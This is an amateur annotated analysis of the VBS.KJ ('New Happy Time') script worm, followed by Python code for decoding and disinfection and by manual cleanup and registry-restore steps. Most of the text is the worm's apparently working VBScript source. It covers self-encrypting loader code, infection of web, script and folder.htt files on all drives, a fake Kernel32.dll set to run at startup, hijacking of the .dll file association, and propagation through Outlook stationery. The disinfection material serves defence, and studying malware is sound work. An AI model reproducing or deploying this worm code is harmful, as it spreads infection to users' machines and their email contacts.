'VBS.KJ (New Happy Time), a web-page macro virus
' Today I got infected by this virus yet again, and the annoying error dialog popped up once more. If I had not known about it, fine, but writing such shoddy code is just disgusting.
' In a fit of anger I dissected it and figured it out. The virus's encryption is fairly interesting; the clumsiest part is the error message that appears when it runs.
' My VB is at a beginner level (I lean towards C); I can manage a HELLO WORLD, so the analysis below may well contain many mistakes.
' Please bear with me.
<BODY onload="vbscript:KJ_start()"> ' The virus code starts executing here
<!--
* This file was automatically generated by Microsoft Internet Explorer 4.0
* using the file %THISDIRPATH%\folder.htt (if customized) or
* %TEMPLATEDIR%\folder.htt (if not customized).
-->
<html>
<body scroll=no onload="Init()">
......
</body>
</html>
.......
<script language=vbscript> ' The next line is also part of the virus
document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"
</script>
<script language=vbscript> ' The virus body is hidden at the end of the FOLDER.HTT file, and it is encrypted; I like that
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute (ThisText) ' Execute the code!
</script>
</BODY>
</HTML>
' End of the virus
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk
' The variables it defines, explained one by one here
' InWhere: whether the program is running inside HTML or has already entered the virus code proper
' HtmlText: needs no explanation, the content of the HTML file
' VbsText: the VBS script text the virus needs
' DegreeSign
' AppleObject
' FSO: all too familiar, the object scripts use to handle the file system
' WsShell: runs WINDOWS programs
' WinPath: holds the WINDOWS system path
' SubE
' FinalyDisk: which disk is the last hard disk; really nasty, does it want to swallow them all??
Sub KJ_start() ' Here it starts; the overall structure is fairly clear
KJSetDim() ' Set up the various variables
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub
Function KJAppendTo(FilePath, TypeStr)
' Checks the target file (in practice FOLDER.HTT); if it has not been infected yet, appends the virus body
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' Open the file for reading
TmpStr = ReadTemp.ReadAll
If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close ' A file that does not contain the string "KJ_start()" has not been infected yet; one that does is skipped here
Exit Function ' Empty files are not processed either
End If ' From here on the file meets the infection conditions
If TypeStr = "htt" Then ' HTT file: every directory has one; show hidden files if you want to see it
ReadTemp.Close ' It was opened for reading; now it must be written, so close it and reopen for writing (my guess ^_^)
Set FileTemp = FSO.OpenTextFile(FilePath, 2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close ' Writes "<BODY onload="vbscript:KJ_start()"> " as the first line of the HTT file; I noted this at the start of this article
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.Attributes = 34 ' Change the file attributes: hidden
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath, 8)
If TypeStr = "html" Then ' HTML file: <BODY onload="vbscript:KJ_start()"> must be written between <HTML></HTML> for it to execute
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function
Function KJChangeSub(CurrentString, LastIndexChar)
' Switch directory
If LastIndexChar = 0 Then
If Left(LCase(CurrentString), 1) <= LCase("c") Then ' If on the first hard disk, jump to the last hard disk
KJChangeSub = FinalyDisk & ":\"
SubE = 0 ' So it cycles around
Else ' Any other disk: subtract one from the drive letter (e.g. 'D'-1 = C)
KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString, 1, LastIndexChar)
End If
End Function
Function KJCreateMail()
' Sends EMAIL via OUTLOOK to the addresses in the address book.
On Error Resume Next
If InWhere = "html" Then
Exit Function ' When running inside HTML, this step is skipped
End If ' First infect the BLANK.HTML file, which IE loads when "use blank page" is the default in its settings
ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then ' If it exists, infect it directly
Call KJAppendTo(ShareFile, "html")
Else ' If it does not exist, forge a BLANK.HTM that carries the virus
Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function
Function KJCreateMilieu()
' Checks whether a script interpreter is installed; if not, it uses the system files Kernel, Kernel32 to carry out its operations
' This fully exposes how fragile WINDOWS is
On Error Resume Next
TempPath = ""
If Not (FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt", "htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)
FileTemp.Write VbsText ' Here the virus is written into Kernel.dll / Kernel32.dll
FileTemp.Close
End Function
Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If ' Analyze the path of the current file
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation, 9)
If FSO.GetExtensionName(ThisLocation) <> "" Then
ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder (ThisLocation)
End If
End Function
Function KJMailReg(RegStr, FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr, FileName
End If
End Function
Function KJOboSub(CurrentString)
' Works out how deeply the current path is nested
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then ' If the depth exceeds 28, go back to the root of the last hard disk
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString) ' Current directory string
Set DicSub = CreateObject("Scripting.Dictionary") ' Build a dictionary holding directories and depth
Set Folders = ThisFolder.SubFolders ' Get the subdirectories
FolderCount = 0 ' Initialize the subdirectory count to zero
For Each TempFolder In Folders ' Count the subdirectories
FolderCount = FolderCount + 1
DicSub.Add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then ' If the dictionary is empty, i.e. there are no subdirectories
LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' Position of the last '\' in the path
SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' The deepest subdirectory
CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' Switch to the parent directory
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\" ' Walk into the subdirectories stored in the dictionary
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then ' Enter the subdirectory
CurrentString = CurrentString & DicSub.Item(j + 1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)
SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)
CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' Switch to the directory one level up
End If
End If
Loop
KJOboSub = CurrentString
End Function
Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i = 1 To 5 ' Infect the files in directories at each level
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder (DiskDegree)
Next
WsShell.RegWrite RegPathValue, DiskDegree ' Write to the registry, recording the deepest directory reached
End Function
Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path, "html") ' Infect every HTM, HTML, ASP, PHP, JSP file in the current directory
ElseIf FileExt = "VBS" Then ' Infect VBS files; this kind of infection is fairly easy
Call KJAppendTo(ThisFile.Path, "vbs")
ElseIf FileExt = "HTT" Then ' If an HTT file exists
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then
HttExists = 1 ' Whether the current path is the desktop or a directory on the desktop, nothing is spared
End If
If HttExists = 0 Then ' If no HTT file exists, forge one; actually a matching pair of two files
FSO.CopyFile WinPath & "system32\desktop.ini", PathName
FSO.CopyFile WinPath & "web\Folder.htt", PathName
End If
End Function
Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname ' Get the full name of the script file
If Err Then
InWhere = "html" ' It is an HTML file
Else
InWhere = "vbs" ' It is a VBS file
End If
If InWhere = "vbs" Then ' If SCRIPT HOST is installed, things are much easier
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else ' If SCRIPT HOST was not selected at install time, the virus sets it up itself; apparently WINDOWS does not do what the user asked
Set AppleObject = document.applets("KJ_guest") ' Registers a script interpreter with the system through KJ_guest
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object
AppleObject.createInstance() ' Uses SCRIPT HOST to carry out its operations; this is why people are told not to install SCRIPT HOST when installing 98
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' The powerful FileSystem Object
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives ' Get the system's hard disks and floppy drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For ' Anything that is not a hard disk or a floppy cannot be infected
End If
FinalyDisk = DiskTemp.DriveLetter ' The last hard disk drive letter in the system
Next
Dim OtherArr(3) ' A random array
Randomize
For i = 0 To 3
OtherArr(i) = Int((9 * Rnd)) ' From 0 to 9
Next
TempString = ""
For i = 1 To Len(ThisText) ' From 1 to the length of the virus body; the loop below is evidently the virus's encryption pass, the counterpart of the decryption stub
TempNum = Asc(Mid(ThisText, i, 1)) ' Take the ASC value of the character at position I
If TempNum = 13 Then ' If it is 13
TempNum = 28 ' Force it to 28
ElseIf TempNum = 10 Then ' If it is 10
TempNum = 29 ' Force it to 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4)) ' ASC code of the character at I minus OtherArr(I Mod 4)
If TempChar = Chr(34) Then ' If it equals 34, replace it with 18
TempChar = Chr(18)
End If
TempString = TempString & TempChar ' The disguised virus code string has now been generated, completely random
Next ' The next statement is rather tedious
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText = "<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
'UnLockStr is the string that executes the virus; below is what actually runs
'
'Dim KeyArr(3),ThisText
'KeyArr(0) = OtherArr(0)
'KeyArr(1) = OtherArr(1)
'KeyArr(2) = OtherArr(2)
'KeyArr(3) = OtherArr(3)
'For i=1 To Len(ExeString)
' TempNum = Asc(Mid(ExeString,i,1))
' If TempNum = 18 Then
' TempNum = 34
' End If
' TempChar = Chr(TempNum + KeyArr(i Mod 4))
' If TempChar = Chr(28) Then
' TempChar = vbCr
' ElseIf TempChar = Chr(29) Then
' TempChar = vbLf
' End If
' ThisText = ThisText & TempChar
'Next   After the above runs, a ThisText command string has been built
' "Execute(ThisText) " is a string; it can be found in the web page
' ThisText = "ExeString = the contents of TempString"; this assigns THISTEXT
' HtmlText =
' <script language=vbscript>
' <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
' <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
' </APPLET>
' </div>
' </script>
' <script language=vbscript>
' ThisText   the part that can be found in the web page, i.e. "ExeString=..."
' UnLockStr Execute("Dim KeyArr(3)...."
' </script>
' </BODY>
' </HTML>
'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then ' Deeper infection
FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"
End If ' If this machine is a WEB server, every user who browses it will be infected
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"
End If
End Function
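The encoding loop in KJSetDim above and the Execute() stub near the top of the file are exact inverses; here is the pair as a Python reference implementation added for this analysis (not the worm's own code), with a helper that reads the four cleartext KeyArr digits out of a stub and decodes the ExeString literal beside it. The key [7, 7, 3, 8] is the one in the stub above; the sample script and the helper names are this example's own.

```python
import re


def kj_encode(plain, key):
    """KJSetDim's loop: map CR->28 and LF->29, subtract OtherArr(i Mod 4), then
    map a resulting 34 (") to 18. The output therefore contains no newline and
    no double quote, so it can sit inside the VBScript literal ExeString = "...".
    i is 1-based, as in the VBScript For loop."""
    out = []
    for i, ch in enumerate(plain, start=1):
        n = ord(ch)
        if n == 13:
            n = 28
        elif n == 10:
            n = 29
        c = n - key[i % 4]
        if c == 34:
            c = 18
        out.append(chr(c))
    return "".join(out)


def kj_decode(cipher, key):
    """The Execute() stub: 18->34, add KeyArr(i Mod 4), then Chr(28)->CR and
    Chr(29)->LF. Exact inverse of kj_encode."""
    out = []
    for i, ch in enumerate(cipher, start=1):
        n = ord(ch)
        if n == 18:
            n = 34
        c = chr(n + key[i % 4])
        if c == "\x1c":
            c = "\r"
        elif c == "\x1d":
            c = "\n"
        out.append(c)
    return "".join(out)


KEY_RE = re.compile(r"KeyArr\((\d)\) = (\d+)")


def key_from_stub(stub):
    """The four key digits are written in clear inside the Execute(...) stub
    that accompanies every copy (each copy draws a fresh Int(9*Rnd) key, which
    is all that makes the body look different from file to file)."""
    vals = {int(i): int(v) for i, v in KEY_RE.findall(stub)}
    return [vals[i] for i in range(4)]


def decode_from_page(text):
    """Given text holding the ExeString line and its stub, return the body.
    ExeString never contains a double quote (see kj_encode), so the literal
    ends at the first one. Helper name is this example's, not the worm's."""
    body = re.search(r'ExeString = "([^"\n]*)"', text).group(1)
    return kj_decode(body, key_from_stub(text))


# Constructed sample: a harmless two-line script wrapped the way the worm
# wraps its body, using the key [7, 7, 3, 8] visible in the stub above.
SAMPLE_KEY = [7, 7, 3, 8]
SAMPLE_PLAIN = 'Sub KJ_start()\r\nMsgBox "demo"\r\nEnd Sub'
SAMPLE_STUB = ('Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&'
               '"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"'
               '&vbCrLf&"For i=1 To Len(ExeString)")')
SAMPLE_PAGE = ('ExeString = "' + kj_encode(SAMPLE_PLAIN, SAMPLE_KEY) + '"\r\n'
               + SAMPLE_STUB)
```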
' With the analysis above, disinfection becomes much easier
' Disinfection
' 1. For HTT files
' The first line is the start of the virus and should be deleted: the first 0X24 BYTES should be deleted
' Counting back from the end of the file, (0X5A0A-0X2D3C+1=) 0X2CCF BYTES should be deleted
' 2. For HTML, ASP, PHP, JSP files
' Counting back from the end of the file, (0X5E4E-0X3153+1=) 0X2CFC should be deleted
' 3. For VBS files
' Just delete the last 0X2B97+2 (carriage return) BYTES of the file
' 4. As for KERNEL.DLL, it can simply be deleted; to be safe, you can also delete the last 0X2B97 BYTES of the file
' 5. And kjwall.gif: delete it directly.
' 6. The modified registry entries must be restored
' WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
' WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
' RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
' ****************************************************************
' HKEY_CURRENT_USER\Identities\Default User ID   if it is followed by SOFTWARE\ etc., delete the trailing SOFTWARE part and keep the rest
' HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference   just clear the value
' HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360   clear
' HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360   clear
' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference   clear
' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery   clear
' HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32   clear
' HKEY_CLASSES_ROOT\.dll   delete .DLL and everything under it
' HKEY_CLASSES_ROOT\dllfile\DefaultIcon\   delete DLLFILE and everything under it
' HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command
' HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps
' HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode
' HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree   delete DEGREE and everything under it
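A marker-based cleaner for the three file layouts KJAppendTo produces, added here as example code (not part of the original analysis or of the worm). It keys on strings the worm leaves intact in every copy rather than on the byte counts above, which hold only for this sample's payload length; the registry keys and the hidden attribute on .htt files are not touched. The sample inputs are constructed.

```python
import re

# The worm's own infection marker: KJAppendTo skips any file containing it.
MARKER = "KJ_start()"
BODY_TAG = '<BODY onload="vbscript:KJ_start()">'
CRLF = "\r\n"

# Everything KJAppendTo appends, in all three layouts, runs to end of file and
# is preceded by one CRLF. "KJ_guest" is written as "KJ"&"_guest", so anchor on
# strings that stay contiguous: the hidden-div style, the ExeString literal and
# the KeyArr decryption stub.
INJECT_RE = re.compile(
    r"\r?\n"
    r'(?:<HTML>\r?\n<BODY onload="vbscript:KJ_start\(\)">\r?\n)?'  # html/asp/php/jsp
    r"(?:<script language=vbscript>\r?\n"                          # htt and html
    r"document\.[Ww]rite \"<div style='position:absolute;[^\n]*\n"
    r"</script>\r?\n<script language=vbscript>\r?\n)?"
    r'ExeString = "[^\n]*\n'
    r'Execute\("Dim KeyArr\(3\),ThisText"[^\n]*\n'
    r"Execute ?\(ThisText\)\r?\n"
    r"(?:</script>\r?\n</BODY>\r?\n</HTML>|KJ_start\(\))\r?\n?\Z")


def is_infected(text):
    return MARKER in text


def clean(text):
    """Undo KJAppendTo: the prepended BODY line (htt only) and the appended
    payload. If the payload is not recognised the text comes back unchanged."""
    head = BODY_TAG + CRLF
    body = text[len(head):] if text.startswith(head) else text
    m = INJECT_RE.search(body)
    return body[:m.start()] if m else text


def clean_file(path):
    """Disinfect one file in place; True if a payload was removed. latin-1
    maps bytes 1:1 to characters, so untouched content is written back as is."""
    with open(path, "rb") as f:
        text = f.read().decode("latin-1")
    if not is_infected(text):
        return False
    cleaned = clean(text)
    if cleaned == text:
        return False  # marker present but layout not recognised: review by hand
    with open(path, "wb") as f:
        f.write(cleaned.encode("latin-1"))
    return True


# Constructed stand-ins for the text KJSetDim builds; the real ExeString is
# the encrypted worm body, the placeholder below is not.
STUB = ('ExeString = "CONSTRUCTED-PLACEHOLDER"' + CRLF +
        'Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7")' + CRLF +
        "Execute(ThisText)")
HTML_TEXT = ("<script language=vbscript>" + CRLF +
             "document.write \"<div style='position:absolute; left:0px; top:0px;"
             " width:0px; height:0px; z-index:28; visibility: hidden'><\"&\"APPLET"
             " NAME=KJ\"&\"_guest HEIGHT=0 WIDTH=0 code=com.ms.\"&\"activeX.Active"
             "\"&\"XComponent></APPLET></div>\"" + CRLF +
             "</script>" + CRLF + "<script language=vbscript>" + CRLF +
             STUB + CRLF + "</script>" + CRLF + "</BODY>" + CRLF + "</HTML>")
VBS_TEXT = STUB + CRLF + "KJ_start()"


def infected_samples(original):
    """The three layouts KJAppendTo produces around a clean file body."""
    return {
        "htt": BODY_TAG + CRLF + original + CRLF + HTML_TEXT,
        "html": original + CRLF + "<HTML>" + CRLF + BODY_TAG + CRLF + HTML_TEXT,
        "vbs": original + CRLF + VBS_TEXT,
    }
```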